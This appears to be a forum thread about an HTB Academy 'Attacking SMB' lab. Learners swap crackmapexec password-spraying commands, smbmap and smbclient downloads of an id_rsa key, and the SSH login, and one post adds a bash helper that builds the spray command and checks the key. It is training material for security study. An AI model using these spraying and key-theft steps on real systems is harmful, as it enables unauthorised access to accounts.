ATTACKING COMMON SERVICES - Attacking SMB

Hello, guys!
I’m having trouble with the final question of this module. I already found jason’s password, and now it asks me to connect over SSH and retrieve flag.txt. However, when I try to connect, like I did in the previous topic (Attacking FTP), I get a “Permission denied (publickey)” message.
I also found an id_rsa key in the SMB attack, but it is empty.

I actually managed to do it just now: I was typing "GGJ\id_rsa" instead of ".\GGJ\id_rsa" in the --download flag, and somehow it was downloading an empty file.

1 Like

Not sure whether you still need any advice on this box, but I guess it might still be helpful for others who come in the future :slight_smile:

  1. Check which door the password fits into. The way to use the keys might not be as direct as in Attacking FTP.
  2. Once you have the correct password, you can download the file with the corresponding username. The format could be a little tricky, but I believe you can find your way in a few attempts. (In fact, the material gives very nice examples.)
  3. An empty file means that the download was not successful. If the file is successfully downloaded, it gives a pretty delightful sign, as shown in the material.
  4. You might need to look around on the internet or in other modules for the last step. There are plenty of tutorials out there that show how to use the “thing” you got correctly. Once you figure out what to do, you’ll find that it’s actually kind of straightforward.

Hope this helps and have a nice day!!! :stuck_out_tongue_closed_eyes:

I am stuck here, probably because I am a moron.
I want to find out Jason’s password, but when I try to do it with crackmapexec, every username and password combination I use is reported as correct. I believe this is because the share allows NULL sessions. How can I make it actually check for correct credentials?

2 Likes

Okay, yes, I am a … I used the other services running to get the correct credentials…

Hello, how did you manage to find Jason’s password?! I’m brute-forcing with the resource password list, but it’s not there…

Hello,

Can you provide a hint on how to obtain the password for Jason, please? I got the password.list file and used it with CME (-u jason, -p password.list), but no luck. I also tried it with FTP, same deal. Any help is greatly appreciated. Thanks :)

Try using other services and applications with the supplied password list

Big fu*king fail for me was that I didn’t use the full path and didn’t input the domain.

My first attempt was following:

sudo crackmapexec smb 10.129.241.245 -u jason -p pws.list

ending abruptly with:

SMB         10.129.241.245  445    ATTCSVC-LINUX    [*] Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:) (signing:False) (SMBv1:False)
SMB         10.129.241.245  445    ATTCSVC-LINUX    [-] \jason:pws.list STATUS_LOGON_FAILURE

It took me longer than I would admit to figure out why CME was not going through all the passwords.

The next mistake was that the DOMAIN was empty. Running

./enum4linux-ng.py 10.129.241.245 -A -C

as stated in the module, you will find the domain name you are supposed to use.
So the final command should look like this:

sudo crackmapexec smb IP -u jason -p FULL/FING/PATH/TO/LIST -d DomainName

TBF, it would be nice to know these little details beforehand, explained in the module for instance. The fact that this version of CME does such a poor job of handling files and documenting it is one thing. But nobody pointing out that CME may fail to retrieve the domain info automatically (it doesn’t even inform you that it failed), and that this failure breaks the whole attack, just feels like wasted time.

5 Likes

Thanks! I forgot to add the domain to the username as well.

As a guide.

  • For question 1, use the smbclient tool.
  • For question 2, use the crackmapexec tool and the --local-auth parameter and the dictionary provided by HTB in resources.
  • For question 3, you must download the file located in G** (smbmap -H 10.129.219.167 -r G**); use the smbmap tool and add jason’s credentials to get permission to download and read the file.
    Do not forget to set the appropriate permissions (600).

I tried this and it doesn’t work for me. Can you elaborate or DM me, please?

Question 1: smbmap -H ip_address
Question 2: crackmapexec smb ip_address -u 'user_name' -p pws.list --local-auth

Note: pws.list can be found in the resources section (HTB academy)

Question 3: smbclient '\\ip_address\share' -U 'username%password'
smb: \> get file

OR, alternatively: smbmap -H ip_address -u username -p 'password' --download 'share\file'

chmod 600 id_rsa

ssh -i /path/to/id_rsa username@ip_address
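As an added example (not code from the thread, from HTB, or from crackmapexec/smbmap themselves), here are the pre-flight checks a practitioner would want around the spray and the SSH step, covering the two failure modes reported in the posts above: the wordlist argument that CME treated as a single literal password when the relative path did not resolve (the "\jason:pws.list STATUS_LOGON_FAILURE" line), and the zero-byte id_rsa that smbmap wrote when the --download path was wrong. The IP, username and domain in the usage stanza are placeholders; the functions only build the crackmapexec command line and validate the key file locally, they do not talk to the target.

```bash
#!/usr/bin/env bash
# Added example, not code from the thread or from HTB. Hostnames, IPs and
# the domain name in the usage stanza are placeholders.

# Print an absolute path to the wordlist, or fail if it is missing/empty.
# CME received "pws.list" as a literal password in the post above because
# the relative path did not resolve from the working directory.
resolve_wordlist() {
    local list="$1"
    [ -f "$list" ] || { echo "wordlist not found: $list" >&2; return 1; }
    [ -s "$list" ] || { echo "wordlist is empty: $list" >&2; return 1; }
    ( cd "$(dirname "$list")" && printf '%s/%s\n' "$(pwd -P)" "$(basename "$list")" )
}

# Assemble the spray command. Either an explicit domain (the one printed
# by enum4linux-ng) or --local-auth is required, so the attempt is never
# sent with an empty domain field.
build_spray_cmd() {
    local ip="$1" user="$2" list="$3" domain="${4:-}"
    local abs
    abs="$(resolve_wordlist "$list")" || return 1
    if [ -n "$domain" ]; then
        printf 'crackmapexec smb %s -u %s -p %s -d %s\n' "$ip" "$user" "$abs" "$domain"
    else
        printf 'crackmapexec smb %s -u %s -p %s --local-auth\n' "$ip" "$user" "$abs"
    fi
}

# Validate a key pulled over SMB before passing it to ssh -i:
# a zero-byte file means the download failed, the first line must be a
# PEM/OpenSSH private-key header, and ssh ignores keys readable by others.
check_private_key() {
    local key="$1"
    [ -s "$key" ] || { echo "key is empty, download probably failed: $key" >&2; return 1; }
    head -n 1 "$key" | grep -q 'PRIVATE KEY' \
        || { echo "not a private key file: $key" >&2; return 1; }
    chmod 600 "$key"
    # succeed only if the mode is now exactly 0600
    [ -n "$(find "$key" -perm 600)" ]
}

# Usage with placeholder values: run as "./spray_checks.sh demo".
if [ "${1:-}" = "demo" ]; then
    build_spray_cmd 10.129.241.245 jason ./pws.list ATTCSVC-LINUX
    check_private_key ./id_rsa && ssh -i ./id_rsa jason@10.129.241.245
fi
```

build_spray_cmd only prints the command so you can eyeball the resolved path and domain before running it; if the wordlist does not resolve, it fails loudly instead of letting CME spray the filename as a password. check_private_key is the test for point 3 in the guide above: an empty or non-key file is rejected before you waste time on "Permission denied (publickey)".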

Problem

ssh -i id_rsa jason@xxxxxxxxxxx
jason@xxxxxxxxxxx: Permission denied (publickey).

Solution

ssh-add id_rsa                                   
Identity added: id_rsa (jason@attcsvc-linux)

:heart: